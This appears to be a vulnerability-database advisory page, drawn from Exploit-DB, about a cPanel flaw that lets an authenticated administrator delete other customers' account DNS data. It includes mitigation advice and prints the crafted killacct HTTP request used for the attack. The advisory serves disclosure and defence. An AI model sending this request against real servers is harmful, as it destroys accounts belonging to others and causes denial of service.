header-logo
Suggest Exploit
vendor:
cPanel
by:
Unknown
7.5
CVSS
HIGH
Remote Account Deletion
Unknown
CWE
Product Name: cPanel
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Yes
Related CWE: Unknown
CPE: cPanel
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

cPanel Remote Account Deletion

The vulnerability in cPanel allows a remote authenticated administrator to delete customer account DNS information for customers not under their administration. By exploiting this vulnerability, an attacker can cause a denial of service (DoS) condition on vulnerable websites. The attack can be carried out by sending a specially crafted HTTP request to the vulnerable URL: http://www.example.com:2086/scripts/killacct?domain=(domain)&user=(user)&submit-domain=Terminate

Mitigation:

Apply the latest security patches provided by cPanel. Limit administrative privileges and ensure that administrators can only manage the customer accounts under their jurisdiction. Regularly monitor and review DNS information for any unauthorized changes. Implement intrusion detection and prevention systems to detect and block suspicious activities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10468/info

cPanel is prone to a vulnerability that can allow a remote authenticated administrator to delete customer account DNS information for customers that are not administered by that administrator. This attack can allow an attacker to cause a denial of service condition against vulnerable Web sites. 

http://www.example.com:2086/scripts/killacct?domain=(domain)&user=(user)&submit-domain=Terminate